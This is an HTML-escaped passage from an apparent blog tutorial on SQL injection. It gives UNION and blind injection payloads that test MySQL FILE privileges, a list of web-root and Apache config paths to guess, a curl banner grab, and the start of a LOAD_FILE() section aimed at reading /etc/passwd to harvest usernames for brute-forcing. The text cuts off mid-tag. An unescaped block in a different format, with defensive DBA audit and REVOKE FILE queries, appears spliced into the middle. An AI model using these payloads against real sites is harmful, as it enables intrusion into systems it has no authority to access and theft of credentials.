&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;EXAMPLE-PREREQUISITES MET&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img684.imageshack.us/img684/5456/74106261.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="345" src="http://img684.imageshack.us/img684/5456/74106261.png" t$="true" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Once these details are known, you can start working through the options to check the file privileges of the current user. There are many methods; here are a few specifically for checking file privileges:&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;&lt;a href="http://www.site.com/index.php?id=0'"&gt;http://www.site.com/index.php?id=0'&lt;/a&gt; &lt;b style="mso-bidi-font-weight: normal;"&gt;UNION SELECT file_priv FROM mysql.user WHERE user = 'username'&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;&lt;a href="http://www.site.com/index.php?id=1'"&gt;http://www.site.com/index.php?id=1'&lt;/a&gt; &lt;b style="mso-bidi-font-weight: normal;"&gt;AND MID((SELECT file_priv FROM mysql.user WHERE user = 'username'),1,1) = 'Y'&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;&lt;a href="http://www.site.com/index.php?id=0'"&gt;http://www.site.com/index.php?id=0'&lt;/a&gt; &lt;b style="mso-bidi-font-weight: normal;"&gt;UNION SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%'&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpLast" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;&lt;a href="http://www.site.com/index.php?id=1'"&gt;http://www.site.com/index.php?id=1'&lt;/a&gt; &lt;b style="mso-bidi-font-weight: normal;"&gt;AND MID((SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%'),1,1)='Y'&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;If for some reason you can’t access the mysql user table, we can still give things a shot, but it will be slightly blind: we will need to assume we have file privileges and simply test things out with a little trial and error. We also need to determine where we will have read/write access on the server, so we need to work out the relevant paths on the target machine. This can be done, as covered in previous articles, by simply querying the database() &amp;amp; @@datadir values.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
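The privilege checks and path discovery described above are exactly what a database owner should audit first, from the inside, over a trusted DBA connection rather than through the application. The MySQL audit and remediation queries below are an added example written for this section, not the post author's own queries or screenshots; the account name 'webapp'@'localhost' is a placeholder you would replace with the application's real login.

```sql
-- Added example (not from the original post): DBA-side audit of the
-- same facts the injection checks above probe from the outside.

-- 1. Which accounts hold the global FILE privilege? LOAD_FILE(),
--    SELECT ... INTO OUTFILE and INTO DUMPFILE all require it.
SELECT user, host
FROM   mysql.user
WHERE  File_priv = 'Y';

-- The same answer via information_schema (what the second pair of
-- checks above reads); grantee is stored as 'user'@'host'.
SELECT grantee, privilege_type, is_grantable
FROM   information_schema.user_privileges
WHERE  privilege_type = 'FILE';

-- 2. Where could a FILE-capable account read or write? An empty
--    secure_file_priv means anywhere the mysqld OS user can reach.
--    Set it in the server config file to a dedicated directory outside
--    the web root (or, on current releases, to NULL to disable file
--    import/export entirely); it cannot be changed at runtime.
SELECT @@datadir, @@secure_file_priv;

-- 3. Remediation: an application login should never need FILE.
--    'webapp'@'localhost' is a placeholder account name.
REVOKE FILE ON *.* FROM 'webapp'@'localhost';

-- 4. Re-check: FILE should no longer appear in the grants listed.
SHOW GRANTS FOR 'webapp'@'localhost';
```

Only step 3 changes state; the rest is read-only and safe to run on a production server. If the web application's login shows up in step 1, that is precisely the precondition the injection checks above are testing for, and revoking FILE closes off LOAD_FILE() and INTO OUTFILE/DUMPFILE through that account regardless of whether the injection itself has been fixed yet.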
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;NOTE&lt;/b&gt;: If you can’t get these values to return for one reason or another, you can try to trigger error events and skim as much related info as possible from the error messages, as quite often the data directory path and current database are listed in the actual error messages. You may also try to guess the web directory and go at this somewhat blind using the old trial and error method; here are some good places to try:&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/var/www/html/&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/var/www/web1/html/&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/var/www/sitename/htdocs/&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/var/www/localhost/htdocs&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/var/www/vhosts/sitename/httpdocs/&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/etc/init.d/apache&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New 
Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/etc/init.d/apache2&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/etc/httpd/httpd.conf&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/etc/apache/apache.conf&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: 
Calibri;"&gt;/etc/apache/httpd.conf&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/etc/apache2/apache2.conf&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/etc/apache2/httpd.conf&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/usr/local/apache2/conf/httpd.conf&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; 
text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/usr/local/apache/conf/httpd.conf&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/opt/apache/conf/httpd.conf&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/home/apache/httpd.conf&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times 
New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/home/apache/conf/httpd.conf&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/etc/apache2/sites-available/default&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/etc/apache2/vhosts.d/default_vhost.include&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: 
Calibri;"&gt;/templates_compiled/&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/templates_c/&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/templates/&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/temporary/&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: 
Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/images/&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/cache/&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/temp/&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpLast" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;/files/&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;If you do a banner grab you can usually figure out some basic info regarding the webserver and OS which you can use to combine with Google to find other good places to look or try.&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp; &lt;/span&gt;Assuming we have gathered the necessary info up to now we will start to see what we can do…&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-family: Calibri;"&gt;SAMPLE BANNER GRAB USING CURL – “curl –I &lt;a href="http://www.target-site.com/"&gt;http://www.target-site.com/&lt;/a&gt;”:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img195.imageshack.us/img195/9889/31451020.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="176" src="http://img195.imageshack.us/img195/9889/31451020.png" t$="true" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;u&gt;&lt;span style="font-family: Calibri;"&gt;USING LOAD_FILE():&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;We can use LOAD_FILE() to read the contents of any file contained within the webserver. We will typically check for the "/etc/password" file to see if we get lucky and scoop usernames and/or passwords to possible use in bruteforce attack later. It looks like this:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;&lt;a 